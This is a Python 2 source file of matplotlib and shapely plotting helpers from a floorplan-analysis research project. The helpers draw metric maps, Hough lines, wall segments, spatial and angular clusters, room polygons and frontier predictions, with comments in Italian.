| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
5a5985b5278f4fcf14e04488af12d80b71de488a
| 34,890
|
py
|
Python
|
code/floorplan_analyzer/src/util/disegna.py
|
goldleaf3i/predicted2Dlayout
|
0ea3ea065dc1865ece18d4df755794be2eeeef28
|
[
"MIT"
] | 1
|
2019-06-12T02:13:52.000Z
|
2019-06-12T02:13:52.000Z
|
code/floorplan_analyzer/src/util/disegna.py
|
goldleaf3i/predicted2Dlayout
|
0ea3ea065dc1865ece18d4df755794be2eeeef28
|
[
"MIT"
] | null | null | null |
code/floorplan_analyzer/src/util/disegna.py
|
goldleaf3i/predicted2Dlayout
|
0ea3ea065dc1865ece18d4df755794be2eeeef28
|
[
"MIT"
] | null | null | null |
from matplotlib import pyplot as plt
from PIL import Image
import cv2
import random
from descartes import PolygonPatch
from matplotlib.path import Path
import matplotlib.path as mplPath
import matplotlib.patches as patches
import networkx as nx
import matplotlib.colors as colors
import matplotlib.cm as cmx
import numpy as np
import os
import matplotlib
import random
from shapely.geometry import Point
from shapely.geometry import Polygon
def setup_plot():
plt.clf()
plt.cla()
plt.close()
fig, ax = plt.subplots()
plt.axis('equal')
ax.axis('off')
ax.set_xticks([])
ax.set_yticks([])
return fig,ax
def disegna(lista):
'''
disegna una lista di Segmenti
'''
ascisse = []
ordinate = []
for muro in lista:
ascisse.append(muro.x1)
ascisse.append(muro.x2)
ordinate.append(muro.y1)
ordinate.append(muro.y2)
plt.plot(ascisse,ordinate, color='k', linewidth=2.0)
del ascisse[:]
del ordinate[:]
plt.title('test')
plt.savefig('culotroia.png')
def disegna_map(map,savefig = True, format='pdf', filepath = '.', savename = '0_Map',title=False) :
'''
Stampa la mappa di ingresso
'''
fig,ax = setup_plot()
ax.imshow(map)
savename = os.path.join(filepath, savename+'.'+format)
if title :
ax.set_title('0.metric map')
if savefig :
plt.savefig(savename,bbox_inches = 'tight')
else:
plt.show()
def disegna_hough(img, lines,savefig = True, format='pdf', filepath = '.', savename ='2_Hough', title = False):
'''
plotta le hough lines
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
img2 = img.copy()
if(len(img2.shape)==2):
img2 = cv2.cvtColor(img2,cv2.COLOR_GRAY2RGB)
if title :
ax.set_title('1.hough lines') #1.primo plot
for x1,y1,x2,y2 in lines:
cv2.line(img2,(x1,y1),(x2,y2),(0,255,0),2)
ax.imshow(img2,cmap='Greys')
if savefig :
plt.savefig(savename, bbox_inches='tight')
else:
plt.show()
'''
ascisse = []
ordinate = []
for l in lines[0]:
ascisse.extend((l[0],l[2]))
ordinate.extend((l[1],l[3]))
plt.plot(ascisse,ordinate, color='k', linewidth=2.0)
ascisse = []
ordinate = []
plt.show()
'''
def disegna_grafici_per_accuracy(stanze, stanze_gt, savefig = True, format='pdf', filepath = '.', savename = '9_accuracy', title = False):
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title:
ax.set_title('accuracy')
for poly in stanze:
x,y = poly.exterior.xy
ax.plot(x,y, color= 'BLACK', alpha = 0.7, linewidth = 3, solid_capstyle= 'round', zorder = 2 )
for poly in stanze_gt:
x,y = poly.exterior.xy
ax.plot(x,y, color= 'RED', alpha = 0.7, linewidth = 3, solid_capstyle= 'round', zorder = 2 )
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_GT_parziali(stanze_gt, stanze_gt_con_frontira, savefig = True, format='pdf', filepath = '.', savename = '20_stanzeGT', title = False):
'''
disegna stanzeGT
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title:
ax.set_title('stanzeGT')
for poly in stanze_gt:
trovato = False
for p in stanze_gt_con_frontira:
if p.equals(poly):
trovato = True
if trovato == True:
x,y = poly.exterior.xy
ax.plot(x,y, color= 'BLACK', alpha = 0.7, linewidth = 3, solid_capstyle= 'round', zorder = 2 )
else:
x,y = poly.exterior.xy
ax.plot(x,y, color= 'RED', alpha = 0.7, linewidth = 3, solid_capstyle= 'round', zorder = 2 )
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_area_reale_GT_parziali(stanze_gt, stanze_gt_con_frontira,contorno,xmin,ymin,xmax,ymax, savefig = True, format='pdf', filepath = '.', savename = '20_stanzeGT', title = False):
'''
disegna stanzeGT
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title:
ax.set_title('stanzeGT')
for poly in stanze_gt:
trovato = False
for p in stanze_gt_con_frontira:
if p.equals(poly):
trovato = True
if trovato == True:
x,y = poly.exterior.xy
ax.plot(x,y, color= 'BLACK', alpha = 0.7, linewidth = 3, solid_capstyle= 'round', zorder = 2)
p = poly - (poly.intersection(contorno))
#p.buffer(0)
max = 0
best = None
print type(p)
if type(p) == Polygon:
best = p
else:
for po in p.geoms:
if po.area >max:
max = po.area
best = po
f_patch = PolygonPatch(best,fc='#FF3300',ec='BLACK')
ax.add_patch(f_patch)
#ax.set_xlim(xmin,xmax)
#ax.set_ylim(ymin,ymax)
else:
x,y = poly.exterior.xy
ax.plot(x,y, color= 'RED', alpha = 0.7, linewidth = 3, solid_capstyle= 'round', zorder = 2 )
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_stanze_stanzeGt_contorno(stanze, stanze_gt, contours, savefig = True, format='pdf', filepath = '.', savename = '9_accuracy', title = False):
'''
disegna stanze, stanzeGT ed il contorno tutto insieme.
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title:
ax.set_title('accuracy')
for poly in stanze:
x,y = poly.exterior.xy
ax.plot(x,y, color= 'BLACK', alpha = 0.7, linewidth = 3, solid_capstyle= 'round', zorder = 2 )
for poly in stanze_gt:
x,y = poly.exterior.xy
ax.plot(x,y, color= 'RED', alpha = 0.7, linewidth = 3, solid_capstyle= 'round', zorder = 2 )
#contorno
ascisse = []
ordinate = []
for c1 in contours:
ascisse.append(c1[0][0])
ordinate.append(c1[0][1])
ax.plot(ascisse,ordinate,color='0.8',linewidth=3.0)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_stanza_vuote(stanze, savefig = True, format='pdf', filepath = '.', savename = '9_accuracy', title = False, nero = True):
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title:
ax.set_title('accuracy')
if nero ==True:
colore = 'BLACK'
else:
colore = 'RED'
for poly in stanze:
x,y = poly.exterior.xy
ax.plot(x,y, color= colore, alpha = 0.7, linewidth = 3, solid_capstyle= 'round', zorder = 2 )
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_canny(edges_canny, savefig = True, format='pdf', filepath = '.', savename = '1_Canny', title = False):
'''
plotta gli edge individuati da canny
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title:
ax.set_title('canny')
ax.imshow(edges_canny,cmap='Greys')
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_segmenti(lista,savefig = True, format='pdf', filepath = '.', savename = '3_Muri', title = False):
'''
disegna i segmenti passati come lista
'''
fig,ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title:
ax.set_title('3.Muri') #2.muri, plotta i muri
ascisse = []
ordinate = []
for s in lista:
x1 = s.x1
x2 = s.x2
y1 = s.y1
y2 = s.y2
ascisse.extend((x1,x2))
ordinate.extend((y1,y2))
ax.plot(ascisse,ordinate, color='k',linewidth=2)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_segmenti_e_raggi_cerchio(lista, linee, savefig = True, format='pdf', filepath = '.', savename = '3_Muri', title = False):
'''
disegna i segmenti passati come lista e i raggi del cerchio attorno alla frontiera
'''
fig,ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title:
ax.set_title('3.Muri') #2.muri, plotta i muri
ascisse = []
ordinate = []
for s in lista:
x1 = s.x1
x2 = s.x2
y1 = s.y1
y2 = s.y2
ascisse.extend((x1,x2))
ordinate.extend((y1,y2))
ax.plot(ascisse,ordinate, color='k',linewidth=2)
del ascisse[:]
del ordinate[:]
for line in linee:
x, y = line.xy
ax.plot(x, y, color='#6699cc', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
#ax.set_xlim(xmin-1,xmax+1)
#ax.set_ylim(ymin-1,ymax+1)
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_segmenti_raggi_cerchio_contorno(vertici,xmin,ymin,xmax,ymax, lista, linee, savefig = True, format='pdf', filepath = '.', savename = '3_Muri', title = False):
'''
disegna i segmenti passati come lista e i raggi del cerchio attorno alla frontiera
'''
fig,ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title:
ax.set_title('3.Muri') #2.muri, plotta i muri
#linee cerchio
for line in linee:
x, y = line.xy
ax.plot(x, y, color='#6699cc', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=-5)
#contorno
bbPath = mplPath.Path(vertici)
patch = patches.PathPatch(bbPath, facecolor='orange', lw=2)
ax.add_patch(patch)
ax.set_xlim(xmin-1,xmax+1)
ax.set_ylim(ymin-1,ymax+1)
'''
#muri
ascisse = []
ordinate = []
for s in lista:
x1 = s.x1
x2 = s.x2
y1 = s.y1
y2 = s.y2
ascisse.extend((x1,x2))
ordinate.extend((y1,y2))
ax.plot(ascisse,ordinate, color='k',linewidth=2)
del ascisse[:]
del ordinate[:]
'''
#ax.set_xlim(xmin-1,xmax+1)
#ax.set_ylim(ymin-1,ymax+1)
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def get_colors(labels):
colori_assegnati = []
#colors = []
#colors.extend(('#800000','#DC143C','#FF0000','#FF7F50','#F08080','#FF4500','#FF8C00','#FFD700','#B8860B','#EEE8AA','#BDB76B','#F0E68C','#808000','#9ACD32','#7CFC00','#ADFF2F','#006400','#90EE90','#8FBC8F','#00FA9A','#20B2AA','#00FFFF','#4682B4','#1E90FF','#000080','#0000FF','#8A2BE2','#4B0082','#800080','#FF00FF','#DB7093','#FFC0CB','#F5DEB3','#8B4513','#808080'))
cmap = matplotlib.cm.get_cmap('Paired')
for label in set(labels):
rgba = cmap(random.random())
hex =matplotlib.colors.rgb2hex(rgba)
#col = random.choice(colors)
colori_assegnati.append(hex)
return colori_assegnati
def disegna_dbscan(labels, facce, facce_poligoni, xmin, ymin, xmax, ymax, edges, contours,savefig = True, format='pdf', filepath = '.', savename = '6_DBSCAN', title = False):
'''
disegna le facce in base ai cluster ottenuti dal dbscan. Facce dello stesso cluster hanno stesso colore.
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
colori_assegnati = []
#colors = []
#colors.extend(('#800000','#DC143C','#FF0000','#FF7F50','#F08080','#FF4500','#FF8C00','#FFD700','#B8860B','#EEE8AA','#BDB76B','#F0E68C','#808000','#9ACD32','#7CFC00','#ADFF2F','#006400','#90EE90','#8FBC8F','#00FA9A','#20B2AA','#00FFFF','#4682B4','#1E90FF','#000080','#0000FF','#8A2BE2','#4B0082','#800080','#FF00FF','#DB7093','#FFC0CB','#F5DEB3','#8B4513','#808080'))
#plt.subplot(224)
cmap = matplotlib.cm.get_cmap('Paired')
if title :
ax.set_title('6.dbscan')
for label in set(labels):
rgba = cmap(random.random())
col =matplotlib.colors.rgb2hex(rgba)#converto in esadecimale
#col = random.choice(colors)
colori_assegnati.append(col)
for index,l in enumerate(labels):
if (l == label):
f = facce[index]
f_poly = facce_poligoni[index]
f_patch = PolygonPatch(f_poly,fc=col,ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
sommax = 0
sommay = 0
for b in f.bordi:
sommax += (b.x1)+(b.x2)
sommay += (b.y1)+(b.y2)
xtesto = sommax/(2*len(f.bordi))
ytesto = sommay/(2*len(f.bordi))
ax.text(xtesto,ytesto,str(l),fontsize=8)
ascisse = []
ordinate = []
for edge in edges:
if (edge.weight>=0.3):#era 0.3
ascisse.append(edge.x1)
ascisse.append(edge.x2)
ordinate.append(edge.y1)
ordinate.append(edge.y2)
ax.plot(ascisse,ordinate, color='k', linewidth=4.0)
del ascisse[:]
del ordinate[:]
#questo pezzo se sto usando il suo modo di trovare il contorno va tolto
#----------------------da commentare
ascisse = []
ordinate = []
for c1 in contours:
ascisse.append(c1[0][0])
ordinate.append(c1[0][1])
ax.plot(ascisse,ordinate,color='0.8',linewidth=3.0)
del ascisse[:]
del ordinate[:]
#-----------------------da decommentare se uso il suo metodo per riconoscere il contorno
'''
ascisse = []
ordinate = []
for c1 in contours:
for c2 in c1:
ascisse.append(c2[0][0])
ordinate.append(c2[0][1])
ax.plot(ascisse,ordinate,color='0.8',linewidth=3.0)
del ascisse[:]
del ordinate[:]
'''
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
return (colori_assegnati, fig, ax)
def disegna_sovrapposizione_predizione(spazi_iniziali, spazi_predetti, contours , colori, xmin, ymin, xmax, ymax, savefig = True, format='pdf', filepath = '.', savename = '17_sovrapposizione_di_tutto', title = False):
'''
disegna la stanze iniziali, il contorno, e le stanze predette, tutto spvrapposto.
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title :
ax.set_title('17_sovrapposizione_di_tutto')
#plotto le stanze parziali predette
for index,s in enumerate(spazi_predetti):
# if s.out == False and s.parziale == False:
# f_patch = PolygonPatch(s.spazio,fc=colori[index],ec='BLACK')
# ax.add_patch(f_patch)
# ax.set_xlim(xmin,xmax)
# ax.set_ylim(ymin,ymax)
# elif s.out == True:
# f_patch = PolygonPatch(s.spazio,fc='white',ec='BLACK')
# ax.add_patch(f_patch)
# ax.set_xlim(xmin,xmax)
# ax.set_ylim(ymin,ymax)
# #ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str("out"),fontsize=8)
if s.out == False and s.parziale == True:
f_patch = PolygonPatch(s.spazio,fc='#C0C0C0',ec='BLACK',alpha = 0.5)
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str(str(s.cluster_frontiera)),fontsize=8)
#plotto le stanze iniziali
for index,s in enumerate(spazi_iniziali):
if s.out == False and s.parziale == False:
f_patch = PolygonPatch(s.spazio,fc=colori[index],ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
elif s.out == True:
f_patch = PolygonPatch(s.spazio,fc='white',ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
#ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str("out"),fontsize=8)
elif s.out == False and s.parziale == True:
f_patch = PolygonPatch(s.spazio,fc='gray',ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str(str(s.cluster_frontiera)),fontsize=8)
#plotto il contorno
ascisse = []
ordinate = []
for c1 in contours:
ascisse.append(c1[0][0])
ordinate.append(c1[0][1])
ax.plot(ascisse,ordinate,color='0.8',linewidth=3.0)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
return (fig, ax)
def disegna_stanze(stanze, colori, xmin, ymin, xmax, ymax,savefig = True, format='pdf', filepath = '.', savename = '8_Stanze', title = False):
'''
disegna il layout delle stanze.
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
#plt.subplot(224)
if title :
ax.set_title('7.stanze')
for index,s in enumerate(stanze):
f_patch = PolygonPatch(s,fc=colori[index],ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
return (fig, ax)
def disegna_poligoni_interni_esterni(celle_poligoni, out_poligoni, parz_poligoni, xmin, ymin, xmax, ymax,savefig = True, format='pdf', filepath = '.', savename = '8_b_poligoni_in_ed_out', title = False):
'''
disegna il layout delle stanze.
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
#plt.subplot(224)
if title :
ax.set_title('7.poli_in_out')
for index,s in enumerate(celle_poligoni):
f_patch = PolygonPatch(s,fc='orange',ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
for index,s in enumerate(parz_poligoni):
f_patch = PolygonPatch(s,fc='orange',ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
for index,s in enumerate(out_poligoni):
f_patch = PolygonPatch(s,fc='#FFFFFF',ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
return (fig, ax)
def disegna_spazi(spazi,colori, xmin, ymin, xmax, ymax, savefig = True, format='pdf', filepath = '.', savename = '8_Stanze', title = False):
'''
disegna il layout delle stanze.
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
#plt.subplot(224)
if title :
ax.set_title('8.stanze')
for index,s in enumerate(spazi):
if s.out == False and s.parziale == False:
f_patch = PolygonPatch(s.spazio,fc=colori[index],ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
elif s.out == True:
f_patch = PolygonPatch(s.spazio,fc='white',ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str("out"),fontsize=8)
elif s.out == False and s.parziale == True:
f_patch = PolygonPatch(s.spazio,fc='gray',ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str(str(s.cluster_frontiera)),fontsize=8)
#vado ad evidenziare i bordi di una stanza che toccano il bordo dell'immagine(questo per indicare che non posso proseguire da quella parte con la predizione)
for cellette in s.cells:
bordi = cellette.c.bordi
ascisse = []
ordinate = []
for b in bordi:
if b.cluster_spaziale == 'bordo1' or b.cluster_spaziale == 'bordo2' or b.cluster_spaziale == 'bordo3' or b.cluster_spaziale == 'bordo4':
#se tocco le extended dei bordi
x1 = b.x1
x2 = b.x2
y1 = b.y1
y2 = b.y2
ascisse.extend((x1,x2))
ordinate.extend((y1,y2))
ax.plot(ascisse,ordinate, color='r',linewidth=2)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
return (fig, ax)
def disegna_spazi_con_pareti_nascoste(spazi,colori, xmin, ymin, xmax, ymax,edges, savefig = True, format='pdf', filepath = '.', savename = '8_Stanze', title = False):
'''
disegna il layout delle stanze.
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
#plt.subplot(224)
if title :
ax.set_title('8.stanze')
for index,s in enumerate(spazi):
if s.out == False and s.parziale == False:
f_patch = PolygonPatch(s.spazio,fc=colori[index],ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
elif s.out == True:
f_patch = PolygonPatch(s.spazio,fc='white',ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str("out"),fontsize=8)
elif s.out == False and s.parziale == True:
f_patch = PolygonPatch(s.spazio,fc='gray',ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
ax.text(s.spazio.representative_point().x,s.spazio.representative_point().y,str(str(s.cluster_frontiera)),fontsize=8)
#vado ad evidenziare i bordi di una stanza che toccano il bordo dell'immagine(questo per indicare che non posso proseguire da quella parte con la predizione)
for cellette in s.cells:
bordi = cellette.c.bordi
ascisse = []
ordinate = []
for b in bordi:
if b.cluster_spaziale == 'bordo1' or b.cluster_spaziale == 'bordo2' or b.cluster_spaziale == 'bordo3' or b.cluster_spaziale == 'bordo4':
#se tocco le extended dei bordi
x1 = b.x1
x2 = b.x2
y1 = b.y1
y2 = b.y2
ascisse.extend((x1,x2))
ordinate.extend((y1,y2))
ax.plot(ascisse,ordinate, color='r',linewidth=2)
del ascisse[:]
del ordinate[:]
ascisse = []
ordinate = []
for edge in edges:
if (edge.weight>=0.3):
ascisse.append(edge.x1)
ascisse.append(edge.x2)
ordinate.append(edge.y1)
ordinate.append(edge.y2)
ax.plot(ascisse,ordinate, color='k', linewidth=1.0)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
return (fig, ax)
def disegna_contorno(vertici,xmin,ymin,xmax,ymax,savefig = True, format='pdf', filepath = '.', savename = '4_Contorno', title = False):
'''
disegna il contorno esterno della mappa metrica
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
bbPath = mplPath.Path(vertici)
patch = patches.PathPatch(bbPath, facecolor='orange', lw=2)
ax.add_patch(patch)
ax.set_xlim(xmin-1,xmax+1)
ax.set_ylim(ymin-1,ymax+1)
if title :
ax.set_title('4.contorno esterno')
if savefig :
plt.savefig(savename)#bbox_inches='tight')
else :
plt.show()
# def disegna_contorno(vertici,xmin,ymin,xmax,ymax):
# print vertici
# bbPath = mplPath.Path(vertici)
# fig = plt.figure()
# ax = fig.add_subplot(111)
# patch = patches.PathPatch(bbPath, facecolor='orange', lw=2)
# ax.add_patch(patch)
# ax.set_xlim(xmin-1,xmax+1)
# ax.set_ylim(ymin-1,ymax+1)
# plt.show()
def disegna_contorno_e_centro_frontiera(vertici,lista_centri,xmin,ymin,xmax,ymax,savefig = True, format='pdf', filepath = '.', savename = '4_Contorno', title = False):
'''
disegna il contorno esterno della mappa metrica
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
bbPath = mplPath.Path(vertici)
patch = patches.PathPatch(bbPath, facecolor='orange', lw=2)
ax.add_patch(patch)
x= []
y =[]
for centro in lista_centri: #i centri sono flippati
x.append(centro[0])
y.append(centro[1])
ax.plot(x,y, 'ro')
ax.set_xlim(xmin-1,xmax+1)
ax.set_ylim(ymin-1,ymax+1)
if title :
ax.set_title('4.contorno esterno')
if savefig :
plt.savefig(savename)#bbox_inches='tight')
else :
plt.show()
def disegna_contorno_e_area_vista(vertici,cerchio,xmin,ymin,xmax,ymax,savefig = True, format='pdf', filepath = '.', savename = '4_Contorno', title = False):
'''
disegna il contorno con l'area che potrei vedere in seguito dalle metriche
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
bbPath = mplPath.Path(vertici)
patch = patches.PathPatch(bbPath, facecolor='orange', lw=2)
ax.add_patch(patch)
#disegno cerchio
patch1 = PolygonPatch(cerchio, fc='gray', ec='BLACK', alpha=0.2, zorder=1)
ax.add_patch(patch1)
ax.set_xlim(xmin-1,xmax+1)
ax.set_ylim(ymin-1,ymax+1)
if title :
ax.set_title('4.contorno esterno')
if savefig :
plt.savefig(savename)#bbox_inches='tight')
else :
plt.show()
def disegna_contorno_e_retta_frontiera(vertici,line,xmin,ymin,xmax,ymax,savefig = True, format='pdf', filepath = '.', savename = '4_Contorno', title = False):
'''
disegna il contorno e la retta della frontiera
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
bbPath = mplPath.Path(vertici)
patch = patches.PathPatch(bbPath, facecolor='orange', lw=2)
ax.add_patch(patch)
x, y = line.xy
ax.plot(x, y, color='#6699cc', alpha=0.7, linewidth=3, solid_capstyle='round', zorder=2)
ax.set_xlim(xmin-1,xmax+1)
ax.set_ylim(ymin-1,ymax+1)
if title :
ax.set_title('4.contorno esterno')
if savefig :
plt.savefig(savename)#bbox_inches='tight')
else :
plt.show()
def disegna_cluster_angolari(lista_muri, cluster_angolari, savefig = True, format='pdf', filepath = '.',savename = '5b_Contorno', title = False):
'''
disegna con lo stesso colore i muri con stesso cluster angolare
'''
ascisse = []
ordinate = []
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
if title:
ax.set_title('cluster angolari')
#per ogni cluster angolare visualizzo in rosso i segmenti che vi appartengono, in nero quelli che non vi appartengono
for c in set(cluster_angolari):
for muro1 in lista_muri:
if muro1.cluster_angolare == c:
ascisse.extend((muro1.x1,muro1.x2))
ordinate.extend((muro1.y1,muro1.y2))
ax.plot(ascisse,ordinate, color='r', linewidth=2.0)
del ascisse[:]
del ordinate[:]
else:
ascisse.extend((muro1.x1,muro1.x2))
ordinate.extend((muro1.y1,muro1.y2))
ax.plot(ascisse,ordinate, color='g', linewidth=2.0)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_cluster_angolari_corretto(lista_muri, cluster_angolari, savefig = True, format='pdf', filepath = '.',savename = '5b_cluster_angolare', title = False):
'''
disegna con lo stesso colore i muri con stesso cluster angolare
'''
ascisse = []
ordinate = []
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
numofcolors = len(set(cluster_angolari))
cm = plt.get_cmap("nipy_spectral")
cNorm = colors.Normalize(vmin=0, vmax=numofcolors)
scalarMap = cmx.ScalarMappable(norm=cNorm, cmap = cm)
if title:
ax.set_title('cluster angolari')
for index,c in enumerate(np.random.permutation(list(set(cluster_angolari)))):
for muro in lista_muri:
if muro.cluster_angolare == c:
ascisse.extend((muro.x1,muro.x2))
ordinate.extend((muro.y1,muro.y2))
ax.plot(ascisse,ordinate, color=colors.rgb2hex(scalarMap.to_rgba(index)), linewidth=2.0)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegno_mura_segmenti_stanze(stanze, colori, xmin, ymin, xmax, ymax, cluster_spaziali, lista_muri,savefig = True, format='pdf', filepath = '.', savename = '14_tutto', title = False):
'''
mura, segemnti pesanti e stanze
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
ascisse = []
ordinate = []
numofcolors = len(set(cluster_spaziali))
cm = plt.get_cmap("nipy_spectral")
cNorm = colors.Normalize(vmin=0, vmax=numofcolors)
scalarMap = cmx.ScalarMappable(norm=cNorm, cmap = cm)
#plt.subplot(222)
if title :
ax.set_title('4.spatial clusters')
for index,c in enumerate(np.random.permutation(list(set(cluster_spaziali)))):
for muro in lista_muri:
if muro.cluster_spaziale == c:
ascisse.extend((muro.x1,muro.x2))
ordinate.extend((muro.y1,muro.y2))
ax.plot(ascisse,ordinate, color=colors.rgb2hex(scalarMap.to_rgba(index)), linewidth=2.0)
del ascisse[:]
del ordinate[:]
'''
ascisse = []
ordinate = []
for edge in edges:
if (edge.weight>=0.3):#era 0.3
ascisse.append(edge.x1)
ascisse.append(edge.x2)
ordinate.append(edge.y1)
ordinate.append(edge.y2)
ax.plot(ascisse,ordinate, color='k', linewidth=4.0)
del ascisse[:]
del ordinate[:]
'''
#stanze
for index,s in enumerate(stanze):
f_patch = PolygonPatch(s,fc=colori[index],ec='BLACK')
ax.add_patch(f_patch)
ax.set_xlim(xmin,xmax)
ax.set_ylim(ymin,ymax)
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_pareti(edges, savefig = True, format='pdf', filepath = '.', savename = '14_paretis', title = False):
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
ascisse = []
ordinate = []
ascisse = []
ordinate = []
for edge in edges:
if (edge.weight>=0.3):#era 0.3
ascisse.append(edge.x1)
ascisse.append(edge.x2)
ordinate.append(edge.y1)
ordinate.append(edge.y2)
ax.plot(ascisse,ordinate, color='k', linewidth=4.0)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
def disegna_cluster_spaziali(cluster_spaziali, lista_muri,savefig = True, format='pdf', filepath = '.', savename = '5_MURA', title = False):
'''
disegna con lo stesso colore i muri con stesso cluster spaziale
'''
fig, ax = setup_plot()
savename = os.path.join(filepath, savename+'.'+format)
ascisse = []
ordinate = []
numofcolors = len(set(cluster_spaziali))
cm = plt.get_cmap("nipy_spectral")
cNorm = colors.Normalize(vmin=0, vmax=numofcolors)
scalarMap = cmx.ScalarMappable(norm=cNorm, cmap = cm)
#plt.subplot(222)
if title :
ax.set_title('4.spatial clusters')
for index,c in enumerate(np.random.permutation(list(set(cluster_spaziali)))):
for muro in lista_muri:
if muro.cluster_spaziale == c:
ascisse.extend((muro.x1,muro.x2))
ordinate.extend((muro.y1,muro.y2))
ax.plot(ascisse,ordinate, color=colors.rgb2hex(scalarMap.to_rgba(index)), linewidth=2.0)
del ascisse[:]
del ordinate[:]
if savefig :
plt.savefig(savename,bbox_inches='tight')
else :
plt.show()
#metodo alternativo
'''
#per ogni cluster spaziale visualizzo in rosso i segmenti che vi appartengono, in nero quelli che non vi appartengono
for c in set(cluster_spaziali):
for muro1 in lista_muri:
if muro1.cluster_spaziale == c:
ascisse.extend((muro1.x1,muro1.x2))
ordinate.extend((muro1.y1,muro1.y2))
plt.plot(ascisse,ordinate, color='r', linewidth=4.0)
del ascisse[:]
del ordinate[:]
else:
ascisse.extend((muro1.x1,muro1.x2))
ordinate.extend((muro1.y1,muro1.y2))
plt.plot(ascisse,ordinate, color='#51af42', linewidth=2.0)
del ascisse[:]
del ordinate[:]
plt.show()
raw_input("Press enter to exit")
'''
